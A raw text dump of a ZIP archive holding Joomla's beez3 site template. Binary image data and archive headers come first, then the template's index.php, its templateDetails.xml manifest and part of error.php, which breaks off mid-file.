!�C>FQ�(3��fL{�,,ND��i;s�E�ڬi���hJ�\kv28���D�WU�EhC#_��5��F�$��#O�Z�O�ZmJR%f�&	�A�<�!1U��������.�'&g��J%�—Aȁ>��8�Ȑ/����Dp$�l���E5�7�'�G)��hU��C.��!���eU����!11����Q(C�T�ED���T���C_�>���,"L��ės�.����S`p�|��'��ݓ��+�d�ѻ���?���ջ�>}&�-]��m�i{��S�Υ-��;��{��즥�G/�<|��E�]ۏl���rX��&��w<v"kv�959�@�nwt+ؿ�Ru꾇�<�\:zd�m��=��`ϱ��}Sc�Ὃa�Do�G/�x��=�w�ص4��ԝ�MLw?5�:m���<vxsWgO�R�N�i�F���,�:��w����w?~14��w�^��%|���u՛w]�o���W�q7>_���\���o*K�M�~Y����e��@|l�XXQ2C	ITD��>Ć��͋�n��3c�p�F6�����h��'N���5'��Vv���Q�@ (�rDIѨΤ�b�˲�^��:`�F^h&���j��h �-�P�ڴ1���5;�=֖G�hdT����T�eP�&��c�р㔫B��P�p
c�:g���&@`& I4��A �(E������!DU�a�Q���A����&A+(+ԫ8%#Z1�ĵ4UE�e44t����+�^���QE��oHh���Z��ra%�|�|�D��c��۶n�_ڴmK�H9}���?�[�_w��[.:����/����؋�q�������wm�]��O��}�~��J�juu-�D���?��K�<�;���4�fc)1�<r�����������O�ˇ����O����)�/�N�~�l^����j�罵~�ṳ�!��O�F�������?��{�y�A���>__]ym��ξ�_��Bi�}�����:߹r�G|������j�ә��(�e��dz���eLA#Ll@�5U�(!"IS�n�9���ܷm�L�(��}�ˇ�N�_U>*8�S"E��(I�T�kؖ1�	qee��2k�����7­�q�H�E	�
�݉n��*
��F�)�P’��L��T�/�j�!��:6
(��M�n���Hb�"F��K�L�ꅘ4S�ZCJ&�l�Y��P�@�R#�ɔX�6�K�Fa"���Q[k(H�bР���i�qL�JUQ����B�9??O�H�`���8ܦg��۲1{��oVѹ�F�v\r�X������W�F/t�����_?Yn}ѳo������O��_�~���?����yƋnٿ���q��Z���D\}��d;jܮ�7ky����-�&����6b��o���_�������z��I�?�w�o���~͞�����N���yΖ�	t�tM�icz�U�o{���4N^|s�qp-����q���/:R��B�咃7]Wδu.N�Xx������4����J�5���Ƅ�S�*�2jYƐ�dH0b�XX�U"%D@���zz:I��Wz�'F�j���V����Du�(��U��O�K'�@JV����.���\��*��"��t�,�`��x��?�^ؠm%
P %��>V���(��h��b�DW��䦘caC�D$�(���1S�)��^Y]���N�0��r���ڂ���4RT��E3H���QE"%x�:�3Ɯ�8p�����F�
�A�43	
��Q-C}�H���V��6&�����g��!,�*��BYJ�&�UEI��b�u_$�\�ėi�P��*I�|U����p��*I�b�1��,�
�˨E_5�Ƿ��s� e�i�QUN��G�UII�υ�a>NP�����{܁xۋZ��*����ؓz�O_yM���66��I��A}�u������=y�}O�����������w|>�c���G������` l8�#u�L�
`�'6r@�L�B^����l=��׉u����.����PE����0��ױP��������z�H���0�
�灤٪�h��ևZ��o"��'��f����ί��D��yfii��f&�WU"����v����;?���}nt���ex���ރ�o��1U��„�cccc��ڣ��"ǤQ�䬁��*��� �����v{��Z_^������R��3��f0��*���@`�"�)3F�fb�"@@$"e�@�J��,��#3ú�Hd�*�ĨD���d�IB,}e���W
b@	l@J��YJVG�*QJp$ |2��fL
(S����5�F1d�!*գ��D�3��H�'@��
RU06�{�JA5����"aXCI�P�PU�;==?;k��CD_���>����;��k
�ss_�w>�;)K����e@[y���_���b$�"8T�Rw:�qۑ��n�]���t�����PZ��`!�	B�IrnI�:�]���$����>��� ����ԫ�Q�0�Ed55��g�����t�l�A�f���wd��AA< � ���� ��#� 
0� � (�� �� � 
0�|�|�nam}]Q~ack��|�������^ȳ,���0��zf|xj	��c��[=�㹌�)�zs���ϣ�Z1�O��ϗ�ϗ�Z�9lU>=�n�����l~�ǩ[��RnÏdWL�֍n��\����Y+��qT:�2���;���m�)���!�<��qL�il�B�����-���5�p���cl)��6�

0�r�P�����
���^x�x���_F=���!�[�~�"U�_��4�>��������Ma/
��c��pd~0�jn����^()��/P���F���~d|7�E#�O1�\߯t�H8x�(��[���qQA��|�q�I~�C�Hڊ�V�\D�|ɽ���̧���4�+-�5��Էh�Bg���������;Ƶ��-
]�6���"�
s�-����z[�+,? (��K���G������[y���Y�_��vՖ7�
�/|}�l�
I;�s���^�_�u�������7������^�r�����@˅o���<�_}��P
�ܻ���7G�V':�/^���n��Q�s���2i���__�1�l���΋���W��.-�p���E�6k,n�cn(�����zf5���l�������sW
�m�m�n_�����e�Z{�k�ۘm�����p����b󘾾T�Os���n��_�v�e�7�<߫\��lV��X�w��k�����;�]��>������w��7��

��~ ��?���x\��.��*��~��uٖ<�m5%�o�)m�i��_�^6�"ƒ�|�i���~���	�H�@����s��R�����~��Żr��kew����e#<G 4���w�uh*��;w�ƻf=Oj�}���s6+
e�7o~��q���Rr���/�y�A�s��?��sҥ�!/
�~���4X���&��3�;��p�na�riaR���Ε//ޝ������_�+l��V��o��d>{�m�|��K7�[<�u�?h�S`𗴍w/��x����LV���
�v�>"�-̏wT~��k;xy�������^o��7�̏��}�խY�Ǻ8�90`�m�X6{�˼2|�o~�ե's��k�ʢW���������఩�ۛ�o_��Z����Í��t^n��O\�_����XOɭ���\1�Xx5�j�Dӭ���NU�
/����W
�n�-����4��;;�����bmCv����#J���˥W�}{�rY�~X߼�g��#/Ö�n�:�����ωf,
6
���/�b��7�U8`�� ���)437g]խח���Q�����	w2��a}�����uU�."&���W>l�Z���l-�zh��$���K����'����Q/6*j�����%!,�qA��Q�
�-�Ҿə�ޢGc���(��&<�Z�+o��-(m�Z�����K��>�@��)�1�a�L��=���4�����Ā@$X�&7��ᆺa
%sO���?XY30;�\QiJ
5OT7�7>��'��5�f��6�
3��]-OfbRS�~���#�S��*�;�j��a�HO�t��)�*�Z��5Tv��H�[�W}��Ֆ��V2�LrnljC�vE:��+�<��J�+�t��uOS˜zCk�gq4�M����v�0H��s8�����q��º��&=')�!+��R7��P�����%���eM�q���j�v��*
&1i�`��Y�~4����p����Ƙ=�L�MgZh�}<4!-��N��l�W�u�?j�Z�GF���#�Cu#[q���^��XˣQ�nI
�i����aD��Į��u3{���>V�`����ހ!Lb*+������j�Z�YVƛ�j�W|R$��W�M/��w�qØ�=��ɾ���5fF,���jdb��O`�ll]4��K���JIcZ
?���H�i�,��/��F�r������/I��'�kc���zOR*�6k�U�"327;J�'7'�[��������V�$]�`8�W6#"���z�&��	
�I����n�Gfd�FZ{�G��n���r���k~;*�;�ͅ�!NL[�m�b
S��D�����v7��k�v�4�ڒreR1�w�J/�Ĕ���3ᅮ�'N���8�ݞ��
g��WN����tn|R����ZY��>D��s��W��!��2�	"�^T_<�w�3��3�����ώ'�3nuߩ���p��T����v0�3<0A��<�#08�Olb���ܴ�AK�}�}�Y9����s�A4cF�����I~l�
;\N'�7$����p�#��0�i&ð��c{�Ыod���Lp╼�'���\�e\Qo���x���E�'����-�O!S`M���w��z/����xR���;�s�+�I�ޓ��i�pQα�Of�X�46��I�8��k`�1�a1�����8m�8����kx��v��L�~H6�`��9310���cyg���x��ԂҀ�$X�Y���lZ~>$��73�Ю�GD���;��S����qZ��[XZ���V��hTr@���/K;�\D�_+$dsdRM�<�?�SL����z�Ὡ<L�ZZ���ٲY8���.y`���f�F8
f���
�M��s�������$�\
;LC�ڤ�����>a$�9#���#xTR�	�I�T�u,�Y�C��zz�U���x�:��_=Ŷ���� _�C��'��V���h�s�u�ht��/<��O|HLzޙ�9I�$��&��T���9��ms��J�沛� c.W`رw����sݫZb����p#R���p�f����%��R��4��3G�������t����#��ï�1a�vQE����f��z%F$J`S�#/�Ӡ7:1�e3��[�M���
��C�#	�d�A����W{�}-uC�0�k���`����2�d2��e0;��#};.4�ʍL�O���f�ժ�2Z�1�nrl�h����d��mΧ'�]�՘�N��`{ifd�h���얧�5۷��6�ͤU��������K,�L���[l�Fg�6k7���{w���K�$��Re�n;��.�Jrm.�����?�Vt�~6}�в1o�<��ѧ�?�0����wNK�&=.�c2Z�n���d���m�˻������3�S��?��^Q�|�c����e�2j�ǹ��:�ýj�����;���t&�æ�Z�N��6�W���`�iM��`�˱m5�`˄uc��pF��\Z�iˠR1�Q�+�Jj1x��QNw����ow���
���E��|y���P�PG'ص�U�ety���#k��hPn�9aa�q1���$�iQK�9��l�n�XtYL�H�ueL���?d�R=6����l�562;������ڐ
)R٤Ӈ;0�vn`p�`WM)����΂4A����z���@�t��I¾�Z%1uo��!DŽ�Œx&e�!�LEł_zB,��&��H7p�8!ayzjfvZ���!�a���˯����@�Z�f��m6+��No�3��ds8��@��Y�=�-
�͏���J�]�����x�$1"8o�N�6�'�v�9�?bҹ�w[[F�/�cc�o���Ҝ+�ʁ�e�@@���'c�SZ���ܶ�-�?7�>�22�4l��a�
= (��K��N�LfIi�T����v�#�E��C
�?�H��JF۽�m�,��W�9��.j\��<y$!"8�Gr�H��+�wcD���o���v�/h9tf�P�!��b��\�Ě��D��ȸ�`?�/?&Y^����X�L��'����(~h�P�K����Y�
�I�04(T��I�	�A4����)�9�o�H�Z��2�O�t̄gf'�r�q���8A� cz��S�(������O����p�#�
[�N�8H��xi�B2xC�}砬,�y�HnlDx�8�'���c	�sE�G���,+ʁ�rs
��rϾ$H"��L������,��1E�3b]���
KI��I|X�d_V���{;,-;-�B�ƺ�夘��?��g�99�6���K�����>��˺d�?�x���a�Gm���G�%
C����:v�O��{��F�I�S3r��q�<2��>��lU�щ׎��C�x�􃟽����uF�a�ر�X6	��
N�j:[��3⡲��o��k["��$�AJߛh��b�9��ߺ|����a1�هN|��%0��:���#�xL��N��Ѯ�Vj^n,��>q��97��3�p<��7ގ�I�W�f彚��@c���;n�Hx����Su+�ݙ��(a4����@/r|�8��(���I�"����W�q��I�io�ux��iJ�`��d��Xk~������Z�[5�00�d�@TJr,�^�}�L�Ԣ5��wv7ݻ��M:���PV�joɰ��)L��
�X���w_#�kJlG_=%�D���� ?�Ҿ ?����j:x11S[h����/~
����MJ4~�UA��?��?����^qϡ��sN
�)��������@�_�r�---4����� �ˍ�wt��9}�W��WHt�G�<Ao|�?ȣR,�g���Fj�)��? ȯA�B��};�(��|���{1�X���އR��l@�3`AAFAy�fcuC?�ys]���_�^]T��wp�7H�7AAF��ه�*:᧐�ݯꁿ�����K�=����u������Z���A�O0���K�x�?~ᥫ�s&xjq��o.
,`^�[SZ\��{�l��cQ�Yn����W��n�{'79jK���w
�2��v��~���&�h-�v�A[Oc��nv��F��~կZ_��WMn���\��7����ͪS�s�ed�[�Ŋ�+wJ��7 ������?x.ef���[�&n4,,����nߛ�RW]�>�"'���}Bū�jT�bTCΐ�P�[�<ɮx��w�#�d{6�3j<���\.���Y%3��[u����5�=a���cF�0>�O��*)Zw�z[{�&��
*$[YQsDb����oq����%Ol$�2._A�����H$�!8/@�	��˟@�`�Em�럼��؊�k��v�w�I廖�Ó2�~���	�Yo~�i4;������}�al|�J����,�L[��ˣx�'f�I���zG�U��y7-+�<$�;(�Ш��Yal�@��'ҙ6����}�iB$]�54�R�+fՄ�C	*ٌ	� /��iv�D���4�DT)���IEND�B`�PK՜�\^|#T�"�"beez3/index.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

JLoader::import('joomla.filesystem.file');

// Check modules
$showRightColumn = ($this->countModules('position-3') or $this->countModules('position-6') or $this->countModules('position-8'));
$showbottom      = ($this->countModules('position-9') or $this->countModules('position-10') or $this->countModules('position-11'));
$showleft        = ($this->countModules('position-4') or $this->countModules('position-7') or $this->countModules('position-5'));

if ($showRightColumn === false && $showleft === false)
{
	$showno = 0;
}

JHtml::_('behavior.framework', true);

// Get params
$color          = $this->params->get('templatecolor');
$logo           = $this->params->get('logo');
$navposition    = $this->params->get('navposition');
$headerImage    = $this->params->get('headerImage');
$config         = JFactory::getConfig();
$bootstrap      = explode(',', $this->params->get('bootstrap'));
$option         = JFactory::getApplication()->input->getCmd('option', '');

// Output as HTML5
$this->setHtml5(true);

if (in_array($option, $bootstrap))
{
	// Load optional rtl Bootstrap css and Bootstrap bugfixes
	JHtml::_('bootstrap.loadCss', true, $this->direction);
}

// Add stylesheets
JHtml::_('stylesheet', 'templates/system/css/system.css', array('version' => 'auto'));
JHtml::_('stylesheet', 'position.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'layout.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', 'print.css', array('version' => 'auto', 'relative' => true), array('media' => 'print'));
JHtml::_('stylesheet', 'general.css', array('version' => 'auto', 'relative' => true));
JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '.css', array('version' => 'auto', 'relative' => true));

if ($this->direction === 'rtl')
{
	JHtml::_('stylesheet', 'template_rtl.css', array('version' => 'auto', 'relative' => true));
	JHtml::_('stylesheet', htmlspecialchars($color, ENT_COMPAT, 'UTF-8') . '_rtl.css', array('version' => 'auto', 'relative' => true));
}

if ($color === 'image')
{
	$this->addStyleDeclaration("
	.logoheader {
		background: url('" . $this->baseurl . "/" . htmlspecialchars($headerImage) . "') no-repeat right;
	}
	body {
		background: " . $this->params->get('backgroundcolor') . ";
	}");
}

JHtml::_('stylesheet', 'ie7only.css', array('version' => 'auto', 'relative' => true, 'conditional' => 'IE 7'));

// Check for a custom CSS file
JHtml::_('stylesheet', 'user.css', array('version' => 'auto', 'relative' => true));

JHtml::_('bootstrap.framework');

// Add template scripts
JHtml::_('script', 'templates/' . $this->template . '/javascript/md_stylechanger.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/hide.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/respond.src.js', array('version' => 'auto'));
JHtml::_('script', 'templates/' . $this->template . '/javascript/template.js', array('version' => 'auto'));

// Check for a custom js file
JHtml::_('script', 'templates/' . $this->template . '/javascript/user.js', array('version' => 'auto'));

require __DIR__ . '/jsstrings.php';

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
	<head>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0, user-scalable=yes"/>
		<meta name="HandheldFriendly" content="true" />
		<meta name="apple-mobile-web-app-capable" content="YES" />
		<jdoc:include type="head" />
	</head>
	<body id="shadow">
		<div id="all">
			<div id="back">
				<header id="header">
					<div class="logoheader">
						<h1 id="logo">
						<?php if ($logo) : ?>
							<img src="<?php echo $this->baseurl; ?>/<?php echo htmlspecialchars($logo, ENT_QUOTES); ?>"  alt="<?php echo htmlspecialchars($this->params->get('sitetitle')); ?>" />
						<?php endif;?>
						<?php if (!$logo AND $this->params->get('sitetitle')) : ?>
							<?php echo htmlspecialchars($this->params->get('sitetitle')); ?>
						<?php elseif (!$logo AND $config->get('sitename')) : ?>
							<?php echo htmlspecialchars($config->get('sitename')); ?>
						<?php endif; ?>
						<span class="header1">
						<?php echo htmlspecialchars($this->params->get('sitedescription')); ?>
						</span></h1>
					</div><!-- end logoheader -->
					<ul class="skiplinks">
						<li><a href="#main" class="u2"><?php echo JText::_('TPL_BEEZ3_SKIP_TO_CONTENT'); ?></a></li>
						<li><a href="#nav" class="u2"><?php echo JText::_('TPL_BEEZ3_JUMP_TO_NAV'); ?></a></li>
						<?php if ($showRightColumn) : ?>
							<li><a href="#right" class="u2"><?php echo JText::_('TPL_BEEZ3_JUMP_TO_INFO'); ?></a></li>
						<?php endif; ?>
					</ul>
					<h2 class="unseen"><?php echo JText::_('TPL_BEEZ3_NAV_VIEW_SEARCH'); ?></h2>
					<h3 class="unseen"><?php echo JText::_('TPL_BEEZ3_NAVIGATION'); ?></h3>
					<jdoc:include type="modules" name="position-1" />
					<div id="line">
						<div id="fontsize"></div>
						<h3 class="unseen"><?php echo JText::_('TPL_BEEZ3_SEARCH'); ?></h3>
						<jdoc:include type="modules" name="position-0" />
					</div> <!-- end line -->
				</header><!-- end header -->
				<div id="<?php echo $showRightColumn ? 'contentarea2' : 'contentarea'; ?>">
					<div id="breadcrumbs">
						<jdoc:include type="modules" name="position-2" />
					</div>

					<?php if ($navposition === 'left' and $showleft) : ?>
						<nav class="left1 <?php if ($showRightColumn == null) { echo 'leftbigger';} ?>" id="nav">
							<jdoc:include type="modules" name="position-7" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-4" style="beezHide" headerLevel="3" state="0 " />
							<jdoc:include type="modules" name="position-5" style="beezTabs" headerLevel="2"  id="3" />
						</nav><!-- end navi -->
					<?php endif; ?>

					<div id="<?php echo $showRightColumn ? 'wrapper' : 'wrapper2'; ?>" <?php if (isset($showno)){echo 'class="shownocolumns"';}?>>
						<div id="main">

							<?php if ($this->countModules('position-12')) : ?>
								<div id="top">
									<jdoc:include type="modules" name="position-12" />
								</div>
							<?php endif; ?>

							<jdoc:include type="message" />
							<jdoc:include type="component" />

						</div><!-- end main -->
					</div><!-- end wrapper -->

					<?php if ($showRightColumn) : ?>
						<div id="close">
							<a href="#" onclick="auf('right')">
							<span id="bild">
								<?php echo JText::_('TPL_BEEZ3_TEXTRIGHTCLOSE'); ?>
							</span>
							</a>
						</div>

						<aside id="right">
							<h2 class="unseen"><?php echo JText::_('TPL_BEEZ3_ADDITIONAL_INFORMATION'); ?></h2>
							<jdoc:include type="modules" name="position-6" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-8" style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-3" style="beezDivision" headerLevel="3" />
						</aside><!-- end right -->
					<?php endif; ?>

					<?php if ($navposition === 'center' and $showleft) : ?>
						<nav class="left <?php if ($showRightColumn == null) { echo 'leftbigger'; } ?>" id="nav" >

							<jdoc:include type="modules" name="position-7"  style="beezDivision" headerLevel="3" />
							<jdoc:include type="modules" name="position-4" style="beezHide" headerLevel="3" state="0 " />
							<jdoc:include type="modules" name="position-5" style="beezTabs" headerLevel="2"  id="3" />

						</nav><!-- end navi -->
					<?php endif; ?>

					<div class="wrap"></div>
				</div> <!-- end contentarea -->
			</div><!-- back -->
		</div><!-- all -->

		<div id="footer-outer">
			<?php if ($showbottom) : ?>
				<div id="footer-inner" >

					<div id="bottom">
						<div class="box box1"> <jdoc:include type="modules" name="position-9" style="beezDivision" headerlevel="3" /></div>
						<div class="box box2"> <jdoc:include type="modules" name="position-10" style="beezDivision" headerlevel="3" /></div>
						<div class="box box3"> <jdoc:include type="modules" name="position-11" style="beezDivision" headerlevel="3" /></div>
					</div>

				</div>
			<?php endif; ?>

			<div id="footer-sub">
				<footer id="footer">
					<jdoc:include type="modules" name="position-14" />
				</footer><!-- end footer -->
			</div>
		</div>
		<jdoc:include type="modules" name="debug" />
	</body>
</html>
PK՜�\2H�	��beez3/templateDetails.xmlnu�[���<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE install PUBLIC "-//Joomla! 2.5//DTD template 1.0//EN" "https://www.joomla.org/xml/dtd/1.6/template-install.dtd">
<extension version="3.1" type="template" client="site">
	<name>beez3</name>
	<creationDate>25 November 2009</creationDate>
	<author>Angie Radtke</author>
	<authorEmail>a.radtke@derauftritt.de</authorEmail>
	<authorUrl>http://www.der-auftritt.de</authorUrl>
	<copyright>(C) 2010 Open Source Matters, Inc.</copyright>
	<license>GNU General Public License version 2 or later; see LICENSE.txt</license>
	<version>3.1.0</version>
	<description>TPL_BEEZ3_XML_DESCRIPTION</description>

	<files>
		<folder>css</folder>
		<folder>html</folder>
		<folder>images</folder>
		<folder>javascript</folder>
		<folder>language</folder>
		<filename>index.php</filename>
		<filename>templateDetails.xml</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<filename>jsstrings.php</filename>
		<filename>favicon.ico</filename>
		<filename>component.php</filename>
		<filename>error.php</filename>
	</files>

	<positions>
		<position>debug</position>
		<position>position-0</position>
		<position>position-1</position>
		<position>position-2</position>
		<position>position-3</position>
		<position>position-4</position>
		<position>position-5</position>
		<position>position-6</position>
		<position>position-7</position>
		<position>position-8</position>
		<position>position-9</position>
		<position>position-10</position>
		<position>position-11</position>
		<position>position-12</position>
		<position>position-13</position>
		<position>position-14</position>
	</positions>

	<!-- 	For core templates, we also install/uninstall the language files in the core language folders.
	-->
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.tpl_beez3.ini</language>
		<language tag="en-GB">en-GB/en-GB.tpl_beez3.sys.ini</language>
	</languages>

	<config>
		<fields name="params">
			<fieldset name="advanced">
				<field 
					name="wrapperSmall"  
					type="number" 
					label="TPL_BEEZ3_FIELD_WRAPPERSMALL_LABEL"
					description="TPL_BEEZ3_FIELD_WRAPPERSMALL_DESC"
					class="validate-numeric" 
					default="53"
					filter="integer"
				/>

				<field 
					name="wrapperLarge"  
					type="number" 
					label="TPL_BEEZ3_FIELD_WRAPPERLARGE_LABEL"
					description="TPL_BEEZ3_FIELD_WRAPPERLARGE_DESC"
					class="validate-numeric" 
					default="72"
					filter="integer"
				 />

				<field 
					name="logo"
					type="media"
					label="TPL_BEEZ3_FIELD_LOGO_LABEL" 
					description="TPL_BEEZ3_FIELD_LOGO_DESC" 
				/>

				<field 
					name="sitetitle"  
					type="text" 
					label="TPL_BEEZ3_FIELD_SITETITLE_LABEL"
					description="TPL_BEEZ3_FIELD_SITETITLE_DESC"
					default=""
					filter="string" 
				/>

				<field 
					name="sitedescription"  
					type="text" 
					label="TPL_BEEZ3_FIELD_DESCRIPTION_LABEL"
					description="TPL_BEEZ3_FIELD_DESCRIPTION_DESC"
					default=""
					filter="string" 
				/>

				<field 
					name="navposition" 
					type="list" 
					label="TPL_BEEZ3_FIELD_NAVPOSITION_LABEL"
					description="TPL_BEEZ3_FIELD_NAVPOSITION_DESC"
					default="center"
					filter="word"
					>
					<option value="center">TPL_BEEZ3_OPTION_AFTER_CONTENT</option>
					<option value="left">TPL_BEEZ3_OPTION_BEFORE_CONTENT</option>
				</field>

				<field 
					name="bootstrap" 
					type="textarea"
					label="TPL_BEEZ3_FIELD_BOOTSTRAP_LABEL"
					description="TPL_BEEZ3_FIELD_BOOTSTRAP_DESC"
					rows="4" 
					columns="30"
				/>

				<field
					name="templatecolor" 
					type="list" 
					label="TPL_BEEZ3_FIELD_TEMPLATECOLOR_LABEL"
					description="TPL_BEEZ3_FIELD_TEMPLATECOLOR_DESC"
					default="nature"
					filter="word"
					>
					<option value="nature">TPL_BEEZ3_OPTION_NATURE</option>
					<option value="personal">TPL_BEEZ3_OPTION_PERSONAL</option>
					<option value="red">TPL_BEEZ3_OPTION_RED</option>
					<option value="turq">TPL_BEEZ3_OPTION_TURQ</option>
					<option value="image">TPL_BEEZ3_OPTION_IMAGE</option>
				</field>

				<field 
					name="headerImage" 
					type="media"
					label="TPL_BEEZ3_FIELD_HEADER_IMAGE_LABEL" 
					description="TPL_BEEZ3_FIELD_HEADER_IMAGE_DESC" 
					showon="templatecolor:image" 
				/>

				<field 
					name="backgroundcolor" 
					type="color" 
					label="TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_LABEL"
					description="TPL_BEEZ3_FIELD_HEADER_BACKGROUND_COLOR_DESC"
					default="#eee"
					showon="templatecolor:image" 
				/>

			</fieldset>
		</fields>
	</config>
</extension>
PK՜�\5���9!9!beez3/error.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   (C) 2010 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentError $this */

$showRightColumn = 0;
$showleft        = 0;
$showbottom      = 0;

// Get params
$app         = JFactory::getApplication();
$params      = $app->getTemplate(true)->params;
$logo        = $params->get('logo');
$color       = $params->get('templatecolor');
$navposition = $params->get('navposition');
$format      = $app->input->getCmd('format', 'html');
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta charset="utf-8" />
	<title><?php echo $this->error->getCode(); ?> - <?php echo htmlspecialchars($this->error->getMessage(), ENT_QUOTES, 'UTF-8'); ?></title>
	<link href="<?php echo $this->baseurl; ?>/templates/system/css/system.css" rel="stylesheet" />
	<link href="<?php echo $this->baseurl; ?>/templates/system/css/error.css" rel="stylesheet" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/position.css" rel="stylesheet" media="screen" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/layout.css" rel="stylesheet" media="screen" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/print.css" rel="stylesheet" media="print" />
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color); ?>.css" rel="stylesheet" />
	<?php $files = JHtml::_('stylesheet', 'general.css', array('relative' => true, 'returnPath' => true)); ?>
	<?php if ($files) : ?>
		<?php if (!is_array($files)) : ?>
			<?php $files = array($files); ?>
		<?php endif; ?>
	<?php foreach ($files as $file) : ?>
		<link href="<?php echo $file; ?>" rel="stylesheet" />
	<?php endforeach; ?>
	<?php endif; ?>
	<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color, ENT_COMPAT, 'UTF-8'); ?>.css" rel="stylesheet" />
	<?php if ($this->direction === 'rtl') : ?>
		<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template; ?>/css/template_rtl.css" rel="stylesheet" />
		<?php if (file_exists(JPATH_SITE . '/templates/' . $this->template . '/css/' . $color . '_rtl.css')) : ?>
			<link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/<?php echo htmlspecialchars($color, ENT_COMPAT, 'UTF-8'); ?>_rtl.css" rel="stylesheet" />
		<?php endif; ?>
	<?php endif; ?>
	<?php if ($app->get('debug_lang', '0') == '1' || $app->get('debug', '0') == '1') : ?>
		<link href="<?php echo JUri::root(true); ?>/media/cms/css/debug.css" rel="stylesheet" />
	<?php endif; ?>
	<!--[if lte IE 6]><link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/ieonly.css" rel="stylesheet" /><![endif]-->
	<!--[if IE 7]><link href="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/css/ie7only.css" rel="stylesheet" /><![endif]-->
	<!--[if lt IE 9]><script src="<?php echo JUri::root(true); ?>/media/jui/js/html5.js"></script><![endif]-->
	<style>
	<!--
		#errorboxbody
		{margin:30px}
		#errorboxbody h2
		{font-weight:normal;
		font-size:1.5em}
		#searchbox
		{background:#eee;
		padding:10px;
		margin-top:20px;
		border:solid 1px #ddd
		}
	-->
	</style>
</head>
	<body>
		<div id="all">
			<div id="back">
				<div id="header">
					<div class="logoheader">
						<h1 id="logo">
							<?php if ($logo) : ?>
								<img src="<?php echo $this->baseurl; ?>/<?php echo htmlspecialchars($logo); ?>"  alt="<?php echo htmlspecialchars($params->get('sitetitle')); ?>" />
							<?php else : ?>
								<?php echo htmlspecialchars($params->get('sitetitle')); ?>
							<?php endif; ?>
							<span class="header1">
								<?php echo htmlspecialchars($params->get('sitedescription')); ?>
							</span>
						</h1>
					</div><!-- end logoheader -->
					<ul class="skiplinks">
						<li>
							<a href="#wrapper2" class="u2">
								<?php echo JText::_('TPL_BEEZ3_SKIP_TO_ERROR_CONTENT'); ?>
							</a>
						</li>
						<li>
							<a href="#nav" class="u2">
								<?php echo JText::_('TPL_BEEZ3_ERROR_JUMP_TO_NAV'); ?>
							</a>
						</li>
					</ul>
					<div id="line">
					</div><!-- end line -->
				</div><!-- end header -->
				<div id="contentarea2" >
					<div class="left1" id="nav">
						<h2 class="unseen">
							<?php echo JText::_('TPL_BEEZ3_NAVIGATION'); ?>
						</h2>
						<?php $module = JModuleHelper::getModule('menu'); ?>
						<?php echo JModuleHelper::renderModule($module); ?>
					</div><!-- end navi -->
					<div id="wrapper2">
						<div id="errorboxbody">
							<h2>
								<?php echo JText::_('JERROR_LAYOUT_PAGE_NOT_FOUND'); ?>
							</h2>
							<h3><?php echo JText::_('JERROR_LAYOUT_ERROR_HAS_OCCURRED_WHILE_PROCESSING_YOUR_REQUEST'); ?></h3>
							<p><?php echo JText::_('JERROR_LAYOUT_NOT_ABLE_TO_VISIT'); ?></p>
							<ul>
								<li><?php echo JText::_('JERROR_LAYOUT_AN_OUT_OF_DATE_BOOKMARK_FAVOURITE'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_MIS_TYPED_ADDRESS'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_SEARCH_ENGINE_OUT_OF_DATE_LISTING'); ?></li>
								<li><?php echo JText::_('JERROR_LAYOUT_YOU_HAVE_NO_ACCESS_TO_THIS_PAGE'); ?></li>
							</ul>
							<?php if ($format === 'html' && JModuleHelper::getModule('mod_search')) : ?>
								<div id="searchbox">
									<h3 class="unseen">
										<?php echo JText::_('TPL_BEEZ3_SEARCH'); ?>
									</h3>
									<p>
										<?php echo JText::_('JERROR_LAYOUT_SEARCH'); ?>
									</p>
									<?php $module = JModuleHelper::getModule('mod_search'); ?>
									<?php echo JModuleHelper::renderModule($module); ?>
								</div><!-- end searchbox -->
							<?php endif; ?>
							<div><!-- start goto home page -->
								<p>
